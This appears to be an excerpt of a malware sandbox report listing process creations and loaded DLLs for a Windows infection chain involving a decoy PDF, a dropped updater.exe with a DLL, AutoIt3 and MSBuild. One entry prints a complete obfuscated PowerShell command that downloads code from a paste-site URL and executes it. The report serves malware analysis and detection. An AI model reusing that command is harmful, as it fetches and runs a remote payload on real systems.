0143B9819A2FB97A69508DAFC4323924544B31FF36BBAFC96F545ABECE3235E2FFA3205157DD1EBAE29CD05BAB7A53396ACB35F7F234057291F2FD7A472A2618EDC0995E36672AC725DE56E49AF3EDF3D49DABEB7C2E83CD39E4A1E4FD35C3AE52263B5EA0B9C94C447FBB37466E6EFC8913CDAE17BFFF7B13AE3DD38F2D855590BF0F8E86C627D41DF7AD14A562C3E7585030D97BC4B00D705840832C3E7A736A65B9A5DF8180343A6943D342BE79D729D85C9670DBBA11668A04D31F4257B8AC87E18DD94CACE14A949C27E6CCF7B24407AE865A3F706E6C802E46ACD0EE5590E5662C7F9E7F0F86445A3D9A74256659EB54C1EFAB0842363E035766605E44B0A632498B42DF7071A7BEE137394B4BE7714C9295A3BBCBC40ACF9EF837543FB9ABBBDA25577ADB9B87B50D5270E313C6D8E4F78F5E0A28F4AA66FC9FEFCF3EC4C1EF59EF0FDDE684CEE62FDCFB62D4EBA5	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command cd;Set-Variable t8 (.(Get-ChildItem Variable:\Eonte).Value.InvokeCommand.(((Get-ChildItem Variable:\Eonte).Value.InvokeCommand\|Get-Member\|Where-Object{(Get-Variable _).Value.Name-ilike'Cmt'}).Name).Invoke((Get-ChildItem Variable:\Eonte).Value.InvokeCommand.(((Get-ChildItem Variable:\Eonte).Value.InvokeCommand\|Get-Member\|Where-Object{(Get-Variable _).Value.Name-ilike'Gome'}).Name).Invoke('Nect',$TRUE,1))Net.WebClient);SV s 'https://nopaste.net/SFHgtxFGtB';&(Get-ChildItem Variable:\Eonte).Value.InvokeCommand.(((Get-ChildItem Variable:\Eonte).Value.InvokeCommand\|Get-Member\|Where-Object{(Get-Variable _).Value.Name-ilike'Cmt'}).Name).Invoke((Get-ChildItem Variable:\Eonte).Value.InvokeCommand.(((Get-ChildItem Variable:\Eonte).Value.InvokeCommand\|Get-Member\|Where-Object{(Get-Variable _).Value.Name-ilike'Gome'}).Name).Invoke('In-Exion',$TRUE,$TRUE))([String]::Join('',(((Get-Item Variable:\t8).Value.((((Get-Item Variable:\t8).Value\|Get-Member)\|Where-Object{(Get-Variable _).Value.Name-ilike'nl*a'}).Name).Invoke((GCI Variable:\s).Value)\|ForEach{(Get-Item Variable:/_).Value-As'Char'}))))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\i1040gi.pdf"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\27589682\updater.exe "C:\Users\user~1\AppData\Local\Temp\27589682\updater.exe" C:\Users\user~1\AppData\Local\Temp\27589682\OWoDjWrI.dll	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1680,i,7793574155390070799,18078941807343672542,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\faggbgb\AutoIt3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\faggbgb\AutoIt3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: libcrypto.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: imgutil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
